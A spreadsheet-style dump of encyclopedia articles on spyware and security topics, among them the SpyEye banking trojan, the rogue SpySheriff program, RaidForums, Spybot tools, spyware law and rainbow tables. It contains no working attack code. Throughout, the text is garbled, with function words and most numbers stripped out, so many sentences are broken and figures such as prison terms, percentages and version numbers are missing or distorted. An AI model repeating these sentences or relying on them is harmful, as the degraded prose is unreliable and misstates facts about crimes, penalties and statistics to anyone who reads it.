    <t>spyeye malware program attacks users running google chrome, opera, firefox internet explorer microsoft windows operating systems. this malware uses keystroke logging form grabbing steal user credentials malicious use. spyeye allows hackers steal money online bank accounts initiate transactions even valid users logged bank account.spyeye ability insert fields alter existing fields compromised user's browser displays page, allowing prompt user names, passwords, card numbers, thereby giving hackers information allows steal money without account holders ever noticing. save user's false balance (with fraudulent transactions hidden) next time user logs fraudulent transactions real balance displayed user's browser (though bank still sees fraudulent transactions.)spyeye emanated russia 2009 sold underground forums $500+ spyeye advertised features keyloggers, auto-fill credit card modules, email backups, config files (encrypted), zeus killer, http access, pop3 grabbers grabbers.target users institutions united states, united kingdom, mexico, canada india largest victims spyeye; united states made institutions fell victim malware. authors spyeye believed creator zeus said retiring given source code rights sell zeus biggest competitor, creator spyeye trojan; experts warned retirement ruse expect developer return tricks.in 2016, aleksandr andreevich panin, author spyeye, arrested sentenced nine years months prison.hamza bendelladj, co-author spyeye, arrested also sentenced prison combined sentence years hamza panin; charged stealing hundreds millions dollars banks around world. references also conficker command control (malware) gameover zeus, successor zeus operation tovar timeline computer viruses worms tiny banker trojan torpig zeus (malware) zombie (computer science)</t>
  </si>
  <si>
    <t>SpyHunter (software)</t>
  </si>
  <si>
    <t>spyhunter anti-spyware computer program microsoft windows (windows later) operating system. designed remove malware, trojan horses, computer worms, rootkits, malicious software. details spyhunter currently version receives daily definition updates. spyhunter free version, allows user scan computer. purchase required remove found malware. enigmasoftware also offers service website called "esg malwaretracker", shows infected countries spyhunter detected malware.in paid version, user able receive support built-in helpdesk. spyhunter also custom spyware helpdesk team. critical reception magazine gave spyhunter star rating march 2004, saying good spyware detection, complained performance usability. magazine gave spyhunter "good" rating, stars, march 2016. reviewer concluded, "enigma spyhunter promises, eliminating active malware killing malware launches startup. competitors deliver much more." lawsuits february 2016, enigma software filed lawsuit bleeping computer, computer support website. alleged latter engaged smear campaign purpose driving potential customers away spyhunter affiliate competing products. turn, bleeping computer filed lawsuit enigma software also alleged smear campaign. march 2017, enigma software announced press release settlement reached lawsuit bleeping computer, cases would dismissed.in october 2016, enigma software filed lawsuit popular security software vendor, malwarebytes, anti-competitive behavior. lawsuit arose malwarebytes' software began targeting spyhunter potentially unwanted program. november 2017, enigma's case dismissed district court. engima appealed united states court appeals ninth circuit court reversed lower court's decision. panel judges voted that, hold phrase "otherwise objectionable" include software provider finds objectionable anti-competitive reasons." despite this, malwarebytes case merits supreme court denied writ certiorari immunity issue. controversies spyhunter often labeled potentially unwanted program misleading results always showing infections, including clean computers, injects tracking cookies users browser, raising concern whether legitimate not. company also floods search results searching specific threat, linking download spyhunter, even product able remove references</t>
  </si>
  <si>
    <t>SpySheriff</t>
  </si>
  <si>
    <t>spysheriff malware disguises anti-spyware software. attempts mislead user false security alerts, threatening buying program. like rogue antiviruses, producing list false threats, prompts user remove them. software particularly difficult remove, since nests components system restore folders, also blocks system management tools. however, spysheriff removed experienced user, antivirus software, using rescue disk. websites spysheriff hosted www.spysheriff.com www.spy-sheriff.com, operated 2005 shutdown 2008. both domains parked. several similarly-named websites also hosted program, shut down. several typosquatted websites also attempted automatically install spysheriff, including fake version google.com called goggle.com. from 2015 goggle.com, changed ownership following lawsuit google, hosted survey scam displayed links amazon items. 2017, domain hosted blank page, word "goggle" present html script. beginning 2018, site redirected scam site tango-deg.com others, october 2018 existed simple html markup top-level heading reading "goggle.com inc.". late 2019, website became wordpress blog 2020 united states presidential election. blog credits accurately predicting outcome election. features spysheriff infection spysheriff designed behave like genuine antispyware software. user interface features progress counts allegedly found threats, scan results deliberately false, cryptic names "trojan mislead scare user. removal attempts unsuccessful spysheriff reinstall itself. desktop background replaced image resembling blue screen death, notice reading, "spyware infection! your system infected spyware. windows recommends spyware removal tool prevent loss data. using cleaned spyware threats highly discouraged." attempts remove spysheriff remove programs control panel either fails causes computer restart unexpectedly. attempts connect internet browser blocked spysheriff. spy-sheriff.com becomes accessible website, opened program's control panel. attempts remove spysheriff system restore blocked prevents calendar restore points loading. users overcome undoing previous restore operation, system restore itself, allowing easier removal spysheriff. spysheriff detect certain antispyware antivirus programs running machine, disable ending processes soon detects them. this prevent detection removal legitimate antivirus programs. spysheriff disable task manager registry editor, preventing user ending active process removing registry entries windows. renaming 'regedit' 'taskmgr' executables solve problem. also rogue security software trojan horse (computing) notes references external links sheriff website wayback machine (archive index) http://www.bleepingcomputer.com/forums/topic22402.html https://web.archive.org/web/20120401221555/http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?name=program%3awin32%2fspysheriff</t>
  </si>
  <si>
    <t>Viewdle</t>
  </si>
  <si>
    <t>viewdle ukrainian facial recognition company. google reportedly close closing deal company million october 2012. october 2012, google bought viewdle improve android's augmented reality face recognition. company expert field computer vision. viewdle's face object recognition technologies widely used search technology. 2011, google launched image search based technology. 2014, google closed company, forcing ukrainian programmers move office motorola mobility. founding viewdle founded 2006 yegor anchishkin yuriy musatenko, commercial success technology developed kyiv institute cybernetics field image recognition. investment raised businessmen ukrainian diaspora usa.in 2008, anthem venture partners bought stake company's million. october 2010, second round investment took place qualcomm ventures, blackberry partners fund best capital invested million, valuing company 13.5 million. references</t>
  </si>
  <si>
    <t>RaidForums</t>
  </si>
  <si>
    <t>raidforums english-language black hacking internet forum active 2015 2022. website facilitated discussion variety hacking topics notable distributor various data breaches, hacking tools, pornography seizure 2022. website monetized advertisements tiered membership program members higher tiers would receive elevated access forum contents. history raidforums began 2015 platform twitch raiders. domain seizure domain contents seized federal bureau investigation april 2022 month downtime, collaboration united states secret service, united states department justice, variety national international enforcement agencies. administration website allegedly founded 21-year portuguese national, diogo santos coelho screen name "omnipotent", arrested january 2022 united kingdom. arrest occurred pending several years investigation several devices searched warrant hartsfield-jackson international airport june 2018, suggesting owner primary administrator "omnipotent". according hackread.com, separate administrator screen name "jaw" announced seizure officially forum's public telegram channel, redirected subscribers channel raidforums' backup domain rf.to, currently offline. impact time closure 2022, forum 530,000 registered users prolific easily accessible clearnet illicit hacking forums. also hack forums dark0de nulled blackhatworld references external links official website u.s. department justice indictment</t>
  </si>
  <si>
    <t>SpySubtract</t>
  </si>
  <si>
    <t>spysubtract name anti-spyware application microsoft windows developed intermute. maintained trend micro name trend micro anti-spyware, came effect version 3.0. previous versions trend micro branding.trend micro anti-spyware later discontinued november 2007, replaced trend micro antivirus plus antispyware 2008.the program shareware, available download 30-day trial.previously, spysubtract often pre-installed desktop notebook computers. references</t>
  </si>
  <si>
    <t>Spybot worm</t>
  </si>
  <si>
    <t>spybot worm large family computer worms varying characteristics. although actual number versions unknown, estimated well thousands. this briefly held record variants, subsequently surpassed agobot family. common features spybot variants generally several things common: ability spread program kazaa, often addition programs. ability spread least vulnerability windows operating system. earlier versions mostly used dcom buffer overflow, although lsass buffer overflow. ability spread various common backdoor trojan horses. ability spread systems weak administrative passwords. recognition because standard detection classification spybot family, also standard naming convention. because lack standard naming conventions common features, variants spybot worm often confused agobot ircbot family worms. most antivirus programs detect variants generically (e.g. w32/spybot.worm), identifying specific spybot variant indicated next impossible except earliest common versions. result many variants, antivirus company often able recognize remove versions worm. applies antispyware software. denial service attack early detection spybot worm usually comes network engineers detecting denial service attack generated worm tried communicate back various channels. underground uses hackers occasionally worm make easy-access programs channels</t>
  </si>
  <si>
    <t>Spybot – Search &amp; Destroy</t>
  </si>
  <si>
    <t>spybot search destroy (s&amp;d) spyware adware removal computer program compatible microsoft windows. dating back first adwares 2000, spybot scans computer hard disk and/or malicious software. spybot-s&amp;d written german software engineer patrick michael kolla, distributed kolla's irish company safer-networking limited. development began 2000 kolla, still student, wrote small program deal aureate/radiate conducent timesink programs, earliest examples adware. licensing spybot search destroy formerly released freeware personal users (the former freeware edition donationware), featureful versions available purchase. corporate technician users commercial version. paid versions contain anti-virus component uses bitdefender engine. spybot features addition spyware adware detection disinfection, spybot-s&amp;d repair registry, winsock lsps, activex objects, browser hijackers bhos, pups, http cookies, trackerware, heavy duty, homepage hijackers, keyloggers, lsp, tracks, trojans, spybots, revision, kinds malware. also delete tracking cookies. spybot-s&amp;d immunize function block installation spyware occurs e.g. modifying hosts file. secure file deleter included. spybot-s&amp;d originally intended replace complement anti-virus programs (prior 'spybot +av'), detect common trojans rootkits. free-standing rootkit finder, rootalyzer, available.some programs supplied attached spyware adware refuse present; newer versions spybot replace spyware binaries inert dummies (designed fool programs simply check presence spyware's file). order detect recently created programs efficiently, detection updates released weekly improvements added languages better heuristic algorithms. these updates downloaded installed within software variety mirrors. spybot-s&amp;d available versions windows starting windows supplied translated many languages several skins. instructions available website enable users design skins. technical support currently supplied means internet forums support e-mails (with usual response time hours). reviews awards versions spybot-s&amp;d awards including world class 2003 awards, magazine editor's choice user recommended zdnet, wall street journal, guardian, msnbc, reviewers. although magazine initially rated highly 2003, rating declined "poor" 2008 "dismal" 2012, improving "fair" 2014.newer versions program (ver. 2.2.25 ver. 2.4), issued 2014, received rating techradar. 2018 techradar considered spybot among best anti-malware software available. versions version better compatibility previous versions wine (software allows running windows programs linux), restores compatibility windows faulty 1.4.version said safer networking scan several times faster version 1.5.version released july 2014. conflicts commercial anti-malware reported 2009 several commercial security products required users uninstall freely available spybot installed run, stated incompatibility memory-resident "immunizer" teatimer (spybot's real-time protection application).the makers spybot-s&amp;d came conflict norton internet security compatibility issues 2006. symantec recommended uninstalling spybot-s&amp;d installing norton internet security. according safer networking, satisfactory explanation provided decision. antivirus professional mary landesman suggests possible explanation stem graphical glitch teatimer module's confirmation dialog. official explanation safer networking stated error caused program used build code. result users difficulty enabling norton internet security make necessary changes critical registry areas, allowing launch computer startup. aside this, mary landesman, like safer networking, concluded programs issue another. fixed release.kaspersky anti-virus kaspersky internet security since version 2009 force users uninstall spybot installation process, although serious incompatibility known. discussion concluded kaspersky forum, said install spybot all. kaspersky seems reluctant issue, despite receiving several complaints. incompatibility products might occur spybot tries modify hosts-file selected user immunization), kaspersky interpret attempt harmfully manipulate file. this circumvented immunizing hosts-file spybot s&amp;d. trend micro officescan followed norton, kaspersky mcafee simply removing spybot without warning notification afterwards. internet explorer immunisation feature spybot search destroy caused internet explorer start slower expected. kb969897, resolved problem addressing certain security vulnerabilities, issued microsoft 2009. malicious lookalikes there several malicious programs designed look like anti-malware software, similar user interfaces program file names. some actually install spyware. these programs known rogue antispyware. program "spywarebot". this program known rogue antispyware program, fraudulently impersonates various anti-malware software including spybot search destroy. however, lookalike, unlike spybot s&amp;d, requires payment. references external links official website official forums</t>
  </si>
  <si>
    <t>VeriFace</t>
  </si>
  <si>
    <t>veriface face recognition software package developed lenovo, first face verification technology available public computer.instead passwords, veriface identifies users matching unique features individual faces photographs taken 1.3-megapixel webcam. reported version available 2009 could fooled holding photograph individual front webcam, therefore offers limited security default configuration.veriface included ideapad notebooks netbook, currently works windows windows vista, windows windows work previous versions microsoft windows updated work windows also windows hello references</t>
  </si>
  <si>
    <t>Vidoop</t>
  </si>
  <si>
    <t>vidoop privately held company based portland, oregon. flagship product vidoop secure, login solution designed function without traditional passwords, vidoop claimed resistant brute force, keystroke logging, phishing, man-in-the-middle attacks. 2009, vidoop announced going business. founding launch vidoop founded 2006 tulsa, oklahoma. march 2006 employees would initially reveal developing novel login solution hides access code plain sight. after year secretive development testing, company launched product, vidoop secure, expo francisco, california 2007-04-17. luke sontag, co-founder, gave presentation expo demonstrating technology announced unnamed fortune company would replacing login system vidoop july 2007. products vidoop's core technology vidoop dynamic image grid, login tool powers vidoop secure thus myvidoop.com. company also sells advertising space, allowing company place products images grid. there currently multi-national advertisers: smart division daimler) conocophillips (phillips66, conoco, brand stations). regional advertiser: mazzio's. local advertiser: jackie cooper imports local tulsa, auto dealer). vidoop secure vidoop secure user login technology based categorized images. when user enrolls system implementing technology, chooses several categories images (such airplanes, cars, keys). furthermore, user's computer "activated" cookie, provided upon user's confirmation code transmitted either email phone voice text message. time login, cookie found, grid images displayed includes pictures belonging user's chosen categories. user selects images typing randomized letter associated images, forming access code. myvidoop.com myvidoop.com openid provider vidoop powered vidoop secure. openid provider, myvidoop.com part movement aims provide decentralized framework single sign-on. criticisms vidoop criticism regarding claims technology's resistance hacking. example, researchers commercenet described possible attack, also published video man-in-the-middle attack executed myvidoop.com, commercenet weblog. additionally, questions raised accessibility vidoop secure visual impairments.vidoop's authentication scheme essentially consists short secret "pre-authorization" cookie. users' shared secret categories possible 8–10 bits entropy. vidoop allows users enter categories least possible orders, reducing effective secret bit. attacker possession pre-authorization cookie could guess 1-2% passwords three given trials. also captcha two-factor authentication openid references external links vidoop website myvidoop.com video mitm attack myvidoop.com</t>
  </si>
  <si>
    <t>Spyware</t>
  </si>
  <si>
    <t>spyware portmanteau spying software) software malicious behavior aims gather information person organization send another entity harms user—for example, violating privacy endangering device's security. this behavior present malware well legitimate software. websites engage spyware behaviors like tracking. hardware devices also affected. spyware frequently associated advertising involves many issues. because behaviors common, non-harmful uses, providing precise definition spyware difficult task. history first recorded term spyware occurred october 1995 usenet post poked microsoft's business model. spyware first denoted software meant espionage purposes. however, early 2000 founder zone labs, gregor freund, used term press release zonealarm personal firewall. later 2000, parent using zonealarm alerted fact "reader rabbit," educational software marketed children mattel company, surreptitiously sending data back mattel. since then, "spyware" taken present sense. according 2005 study national cyber-security alliance, percent surveyed users' computers infected form spyware. percent surveyed users spyware reported know presence, percent reported given permission installation spyware. 2006, spyware become preeminent security threats computer systems running microsoft windows operating systems. computers internet explorer (ie) primary browser particularly vulnerable attacks, widely used, tight integration windows allows spyware access crucial parts operating system.before internet explorer released part windows service pack browser would automatically display installation window activex component website wanted install. combination user ignorance changes, assumption internet explorer activex components benign, helped spread spyware significantly. many spyware components would also make exploits javascript, internet explorer windows install without user knowledge permission. windows registry contains multiple sections modification values allows software executed automatically operating system boots. spyware exploit design circumvent attempts removal. spyware typically link location registry allows execution. once running, spyware periodically check links removed. automatically restored. this ensures spyware execute operating system booted, even most) registry links removed. overview spyware mostly classified four types: adware, system monitors, tracking including tracking, trojans; examples notorious types include digital rights management capabilities "phone home", keyloggers, rootkits, beacons. these four categories mutually exclusive similar tactics attacking networks devices. main goal install, hack network, avoid detected, safely remove network.spyware mostly used stealing information storing internet users' movements serving pop-up internet users. whenever spyware used malicious purposes, presence typically hidden user difficult detect. some spyware, keyloggers, installed owner shared, corporate, public computer intentionally order monitor users. while term spyware suggests software monitors user's computing, functions spyware extend beyond simple monitoring. spyware collect almost type data, including personal information like internet surfing habits, user logins, bank credit account information. spyware also interfere user's control computer installing additional software redirecting browsers. some spyware change computer settings, result slow internet connection speeds, un-authorized changes browser settings, changes software settings. sometimes, spyware included along genuine software, come malicious website added intentional functionality genuine software (see paragraph facebook, below). response emergence spyware, small industry sprung dealing anti-spyware software. running anti-spyware software become widely recognized element computer security practices, especially computers running microsoft windows. number jurisdictions passed anti-spyware laws, usually target software surreptitiously installed control user's computer. german-speaking countries, spyware used made government called govware computer experts common parlance: regierungstrojaner, literally "government trojan"). govware typically trojan horse software used intercept communications target computer. some countries, like switzerland germany, legal framework governing software. term "policeware" used similar purposes.use term "spyware" eventually declined practice tracking users pushed ever mainstream major websites data mining companies; generally break known laws compel users tracked, fraudulent practices default settings created users language terms-of-service agreements. documented example, cbs/cnet news reported, march 2011, wall street journal analysis revealing practice facebook websites tracking users' browsing activity, linked identity, beyond users' visits activity within facebook site itself. report stated: "here's works. facebook, spend time there, move without logging out. let's next site york times. those buttons, without clicking them, reported back facebook twitter went also identity within accounts. let's moved something like site depression. this also tweet button, google widget, those, too, report back went there." analysis researched brian kennish, founder disconnect, inc. routes infection spyware necessarily spread virus worm infected systems generally attempt transmit copy software computers. instead, spyware installs system deceiving user exploiting software vulnerabilities. most spyware installed without knowledge, using deceptive tactics. spyware deceive users bundling desirable software. other common tactics using trojan horse, gadgets look like normal devices turn something else, keylogger. these devices actually connected device memory units capable recording stroke made keyboard. some spyware authors infect system security holes browser software. when user navigates page controlled spyware author, page contains code attacks browser forces download installation spyware. installation spyware frequently involves internet explorer. popularity history security issues made frequent target. deep integration windows environment make susceptible attack windows operating system. internet explorer also serves point attachment spyware form browser helper objects, modify browser's behaviour. effects behaviors spyware rarely operates alone computer; affected machine usually multiple infections. users frequently notice unwanted behavior degradation system performance. spyware infestation create significant unwanted activity, disk usage, network traffic. stability issues, applications freezing, failure boot, system-wide crashes also common. usually, effect intentional, caused malware simply requiring large amounts computing power, disk space, network usage. spyware, interferes networking software commonly causes difficulty connecting internet. infections, spyware even evident. users assume situations performance issues relate faulty hardware, windows installation problems, another malware infection. some owners badly infected systems resort contacting technical support experts, even buying computer existing system "has become slow". badly infected systems require clean reinstallation software order return full functionality. moreover, types spyware disable software firewalls antivirus software, and/or reduce browser security settings, opens system opportunistic infections. some spyware disables even removes competing spyware programs, grounds spyware-related annoyances increase likelihood users take action remove programs.keyloggers sometimes part malware packages downloaded onto computers without owners' knowledge. some keylogger software freely available internet, others commercial private applications. most keyloggers allow keyboard keystrokes captured, also often capable collecting screen captures computer. typical windows user administrative privileges, mostly convenience. because this, program user runs unrestricted access system. operating systems, windows users able follow principle least privilege non-administrator accounts. alternatively, reduce privileges specific vulnerable internet-facing processes, internet explorer. since windows vista default, computer administrator runs everything limited user privileges, program requires administrative privileges, user account control pop-up prompt user allow deny action. this improves design used previous versions windows. spyware also known tracking software. remedies prevention spyware threat evolved, number techniques emerged counteract these include programs designed remove block spyware, well various user practices reduce chance getting spyware system. nonetheless, spyware remains costly problem. when large number pieces spyware infected windows computer, remedy involve backing user data, fully reinstalling operating system. instance, spyware cannot completely removed symantec, microsoft, tools. anti-spyware programs many programmers commercial firms released products designed remove block spyware. programs tools' spyware doctor, lavasoft's ad-aware patrick kolla's spybot search destroy rapidly gained popularity tools remove, cases intercept, spyware programs. december, 2004, microsoft acquired giant antispyware software, re‑branding microsoft antispyware (beta releasing free download genuine windows windows 2003 users. november, 2005, renamed windows defender.major anti-virus firms symantec, tools, mcafee sophos also added anti-spyware features existing anti-virus products. early anti-virus firms expressed reluctance anti-spyware functions, citing lawsuits brought spyware authors authors sites programs described products "spyware". however, recent versions major firms home business anti-virus products include anti-spyware functions, albeit treated differently viruses. symantec anti-virus, instance, categorizes spyware programs "extended threats" offers real-time protection threats. anti-spyware software works anti-spyware programs combat spyware ways: they provide real-time protection manner similar anti-virus protection: incoming network data scanned spyware, detected threats blocked. anti-spyware software programs used solely detection removal spyware software already installed computer. this kind anti-spyware often scan regular schedule.such programs inspect contents windows registry, operating system files, installed programs, remove files entries match list known spyware. real-time protection spyware works identically real-time anti-virus protection: software scans disk files download time, blocks activity components known represent spyware. cases, also intercept attempts install start-up items modify browser settings. earlier versions anti-spyware programs focused chiefly detection removal. javacool software's spywareblaster, first offer real-time protection, blocked installation activex-based spyware. like anti-virus software, many anti-spyware/adware tools require frequently updated database threats. spyware programs released, anti-spyware developers discover evaluate them, adding list known spyware, allows software detect remove spyware. result, anti-spyware software limited usefulness without regular updates. updates installed automatically manually. popular generic spyware removal tool used requires certain degree expertise hijackthis, scans certain areas windows spyware often resides presents list items delete manually. items legitimate windows files/registry entries advised less knowledgeable subject post hijackthis numerous antispyware sites experts decide delete. spyware program blocked manages installed, resist attempts terminate uninstall some programs work pairs: anti-spyware scanner user) terminates running process, respawns killed program. likewise, spyware detect attempts remove registry keys immediately again. usually, booting infected computer safe mode allows anti-spyware program better chance removing persistent spyware. killing process tree also work. security practices detect spyware, computer users found several practices useful addition installing anti-spyware programs. many users installed browser internet explorer, mozilla firefox google chrome. though browser completely safe, internet explorer greater risk spyware infection large user base well vulnerabilities activex three major browsers close equivalent comes security.some isps—particularly colleges universities—have taken different approach blocking spyware: network firewalls proxies block access sites known install spyware. march 2005, cornell university's information technology department released report detailing behavior particular piece proxy-based spyware, marketscore, steps university took intercept many educational institutions taken similar steps. individual users also install firewalls variety companies. these monitor flow information going networked computer provide protection spyware malware. some users install large hosts file prevents user's computer connecting known spyware-related addresses. spyware installed certain shareware programs offered download. downloading programs reputable sources provide protection source attack.individual users cellphone computer physical (electric) switch, isolated electronic switch disconnects microphone, camera without bypass keep disconnected position use, limits information spyware collect. (policy recommended nist guidelines managing security mobile devices, 2013). applications "stealware" affiliate fraud spyware vendors, notably solutions, written york times dubbed "stealware", spyware researcher edelman terms affiliate fraud, form click fraud. stealware diverts payment affiliate marketing revenues legitimate affiliate spyware vendor. spyware attacks affiliate networks places spyware operator's affiliate user's activity replacing tag, one. spyware operator party gains this. user choices thwarted, legitimate affiliate loses revenue, networks' reputations injured, vendors harmed affiliate revenues "affiliate" party contract. affiliate fraud violation terms service affiliate marketing networks. mobile devices also vulnerable chargeware, manipulates users illegitimate mobile charges. identity theft fraud case, spyware closely associated identity theft. august 2005, researchers security software firm sunbelt software suspected creators common coolwebsearch spyware used transmit "chat sessions, user names, passwords, bank information, etc."; however turned actually (was) sophisticated criminal little trojan that's independent cws." this case currently investigation fbi. federal trade commission estimates 27.3 million americans victims identity theft, financial losses identity theft totaled nearly billion businesses financial institutions least billion out-of-pocket expenses individuals. digital rights management some copy-protection technologies borrowed spyware. 2005, sony music entertainment found using rootkits digital rights management technology like spyware, difficult detect uninstall, poorly written efforts remove could rendered computers unable function. texas attorney general greg abbott filed suit, three separate class-action suits filed. sony later provided workaround website help users remove it.beginning april 2006, microsoft's windows genuine advantage notifications application installed windows "critical security update". while main purpose deliberately uninstallable application ensure copy windows machine lawfully purchased installed, also installs software accused "phoning home" daily basis, like spyware. removed removewga tool. personal relationships stalkerware spyware used monitor electronic activities partners intimate relationships. least software package, loverspy, specifically marketed purpose. depending local laws regarding communal/marital property, observing partner's online activity without consent illegal; author loverspy several users product indicted california 2005 charges wiretapping various computer crimes. browser cookies anti-spyware programs often report advertisers' http cookies, small text files track browsing activity, spyware. while always inherently malicious, many users object third parties using space personal computers business purposes, many anti-spyware programs offer remove them. spyware programs these common spyware programs illustrate diversity behaviors found attacks. note computer viruses, researchers give names spyware programs used creators. programs grouped "families" based shared program code, common behaviors, "following money" apparent financial business connections. instance, number spyware programs distributed claria collectively known "gator". likewise, programs frequently installed together described parts spyware package, even function separately. rogue anti-spyware programs malicious programmers released large number rogue (fake) anti-spyware programs, widely distributed banner warn users computers infected spyware, directing purchase programs actually remove spyware—or else, spyware own.the recent proliferation fake spoofed antivirus products bill antispyware troublesome. users receive popups prompting install protect computer, fact spyware. recommended users install freeware claiming anti-spyware unless verified legitimate. some known offenders include: fake antivirus products constitute percent malware.on january 2006, microsoft washington state attorney general filed suit secure computer spyware cleaner product. legal issues criminal unauthorized access computer illegal computer crime laws, u.s. computer fraud abuse act, u.k.'s computer misuse act, similar laws countries. since owners computers infected spyware generally claim never authorized installation, prima facie reading would suggest promulgation spyware would count criminal act. enforcement often pursued authors malware, particularly viruses. however, spyware developers prosecuted, many operate openly strictly legitimate businesses, though faced lawsuits.spyware producers argue that, contrary users' claims, users fact give consent installations. spyware comes bundled shareware applications described legalese text end-user license agreement (eula). many users habitually ignore purported contracts, spyware companies claria demonstrate users consented. despite ubiquity eulas agreements, single click taken consent entire text, relatively little caselaw resulted use. established common jurisdictions type agreement binding contract certain circumstances. this not, however, mean every agreement contract, every term enforceable. some jurisdictions, including u.s. states iowa washington, passed laws criminalizing forms spyware. such laws make illegal anyone owner operator computer install software alters web-browser settings, monitors keystrokes, disables computer-security software. united states, lawmakers introduced bill 2005 entitled internet spyware prevention act, would imprison creators spyware. administrative sanctions actions federal trade commission sued internet marketing organizations "unfairness doctrine" make stop infecting consumers' spyware. case, seismic entertainment productions, accused defendants developing program seized control nationwide, infected spyware malicious software, bombarded barrage pop-up advertising seismic's clients, exposed security risks, caused malfunction. seismic offered sell victims "antispyware" program computers, stop popups problems seismic caused. november 2006, settlement entered federal court $1.75 million judgment imposed case $1.86 million another, defendants insolventin second case, brought cyberspy software llc, charged cyberspy marketed sold "remotespy" keylogger spyware clients would secretly monitor unsuspecting consumers' computers. according ftc, cyberspy touted remotespy "100% undetectable" "spy anyone. from anywhere." obtained temporary order prohibiting defendants selling software disconnecting internet servers collect, store, provide access information software gathered. case still preliminary stages. complaint filed electronic privacy information center (epic) brought remotespy software ftc's attention. netherlands opta administrative fine, first kind europe, issued independent authority posts telecommunications (opta) netherlands. applied fines total value euro 1,000,000 infecting million computers. spyware concerned called dollarrevenue. articles violated art. decision universal service providers interests users; fines issued based art. 15.4 taken together art. 15.10 dutch telecommunications law. civil former york state attorney general former governor york eliot spitzer pursued spyware companies fraudulent installation software. suit brought 2005 spitzer, california firm intermix media, inc. ended settling, agreeing us$7.5 million stop distributing spyware.the hijacking advertisements also litigation. june 2002, number large publishers sued claria replacing advertisements, settled court. courts decide whether advertisers held liable spyware displays ads. many cases, companies whose advertisements appear spyware pop-ups directly business spyware firm. rather, contracted advertising agency, turn contracts online subcontractor gets paid number "impressions" appearances advertisement. some major firms dell computer mercedes-benz sacked advertising agencies spyware. libel suits spyware developers litigation gone ways. since "spyware" become common pejorative, makers filed libel defamation actions products described. 2003, gator (now known claria) filed suit website pitstop describing program "spyware". pitstop settled, agreeing word "spyware", continues describe harm caused gator/claria software. result, anti-spyware anti-virus companies also used terms "potentially unwanted programs" greyware denote products. webcamgate 2010 webcamgate case, plaintiffs charged suburban philadelphia high schools secretly spied students surreptitiously remotely activating webcams embedded school-issued laptops students using home, therefore infringed privacy rights. school loaded student's computer lanrev's remote activation tracking software. this included now-discontinued "thefttrack". while thefttrack enabled default software, program allowed school district elect activate choose thefttrack surveillance options school wanted enable.thefttrack allowed school district employees secretly remotely activate webcam embedded student's laptop, laptop's screen. that allowed school officials secretly take photos webcam, whatever front line sight, send photos school's server. lanrev software disabled webcams uses (e.g., students unable photo booth video chat), students mistakenly believed webcams work all. webcam surveillance, thefttrack allowed school officials take screenshots send school's server. school officials also granted ability take snapshots instant messages, browsing, music playlists, written compositions. schools admitted secretly snapping 66,000 webshots screenshots, including webcam shots students bedrooms. also cuckoo's (metaphor) cyber spying employee monitoring software industrial espionage malware phishing superfish technical support scam xoftspy portable anti-spyware microphone blocker references external links home computer security carnegie mellon software institute</t>
  </si>
  <si>
    <t>Rainbow table</t>
  </si>
  <si>
    <t>rainbow table partitions function, whose domain values whose codomain keys derived values, chains chain alternating sequence values keys, followed final value. each item chain derived previous item chain algorithmically reproduced first value chain: derivation function produces preceding value, reduction function produces value preceding key. first value last last value chain precomputed stored, making chain virtual table even-numbered field contains value odd-numbered field contains corresponding key. such table used discover secret value (password) given associated key. practical example space–time tradeoff, requiring less processing using storage brute-force attack calculates iteration, requiring processing less storage simple table. derivation function employs salt makes rainbow tables infeasible recovering secret value key. rainbow tables invented philippe oechslin application earlier, simpler algorithm martin hellman. background user authentication, password stored either plaintext produced algorithm usually involves hash function. since password stored plaintext easily stolen actor gains access storage, corresponding password typically stored instead. thus, including authentication system learn password merely looking stored value. when user enters password authentication, computed compared stored user. authentication fails keys match; moreover, authentication would equally fail entered directly password, since different would computed learn password find string which, input derivation function, creates key. this inverting derivation function. although brute-force attack (e.g. dictionary attack) might used attempt invert derivation function, brute-force becomes infeasible possible passwords large enough. alternative brute-force precomputed hash chain tables. rainbow tables special kind table overcome certain technical difficulties. etymology term, "rainbow tables," first used oechslin's initial paper. term refers different reduction functions used increase success rate attack. original method hellman uses many small tables different reduction function each. rainbow tables much bigger different reduction function column. when colors used represent reduction functions, rainbow appears rainbow table. figure oechslin's paper contains black-and-white graphic illustrates sections related. presentation crypto 2003 conference, oechslin added color graphic order make rainbow association clear. enhanced graphic presented conference shown right. precomputed chains given derivation function finite secret values goal precompute that, given output derivation function, used locate element k(v) determine simplest compute k(v) storing table requires θ(|v|n) bits space, size size output prohibitive large |v|. chains technique decreasing space requirement. create chain, function, called reduction function used. given key, produces value necessary reduction function produce exactly inverse derivation function. independent function domain codomain derivation function swapped. chain alternating values keys formed. example, lowercase alphabetic 6-character values, keys bits long, chain might look like this: {\displaystyle {\color {red}{\mathtt {aaaaaa}}}\,{\xrightarrow[{\;k\;}]{}}\,{\mathtt {281daf40}}\,{\xrightarrow[{\;r\;}]{}}\,{\mathtt {sgfnyd}}\,{\xrightarrow[{\;k\;}]{}}\,{\mathtt {920ecf10}}\,{\xrightarrow[{\;r\;}]{}}\,{\color {violet}{\mathtt {kiebgt}}}} generate table, choose random initial values compute chains fixed length storing first last value chain starting point endpoint, respectively. example chain above, "aaaaaa" starting point "kiebgt" endpoint. now, given invert (find corresponding secret value for), compute chain starting applying searching step match current value endpoint table. when match found, almost surely chain, reproduced starting point, value immediately target secret value this works assuming possible values represented virtual table whose rows chains, chain formed corresponds chains, iterating eventually produces value endpoint chain table. example, given pair 920ecf10, chain computed first applying {\displaystyle {\mathtt {920ecf10}}\,{\xrightarrow[{\;r\;}]{}}\,{\color {violet}{\mathtt {kiebgt}}}} since "kiebgt" endpoints table, corresponding starting pair "aaaaaa" chain followed chain 920ecf10 reached: {\displaystyle {\color {red}{\mathtt {aaaaaa}}}\,{\xrightarrow[{\;k\;}]{}}\,{\mathtt {281daf40}}\,{\xrightarrow[{\;r\;}]{}}\,{\mathtt {sgfnyd}}\,{\xrightarrow[{\;\;}]{}}\,{\mathtt {920ecf10}}} thus, password "sgfnyd" different password key). note however chain always contain happen chain starting merges chain different starting point. example, chain fb107e70, also leads kiebgt: 80890 {\displaystyle {\mathtt {fb107e70}}\,{\xrightarrow[{\;r\;}]{}}\,{\mathtt {bvtdll}}\,{\xrightarrow[{\;k\;}]{}}\,{\mathtt {0ee80890}}\,{\xrightarrow[{\;r\;}]{}}\,{\color {violet}{\mathtt {kiebgt}}}} fb107e70 chain starting "aaaaaa". this called false alarm. case, match ignored chain extended looking another match. chain gets extended length good matches, password never produced chains. necessary invert keys create table, created repeatedly used lookups. increasing length chain decreases size table. however, also increases time required perform lookups, time-memory trade-off rainbow table. simple case one-item chains, lookup 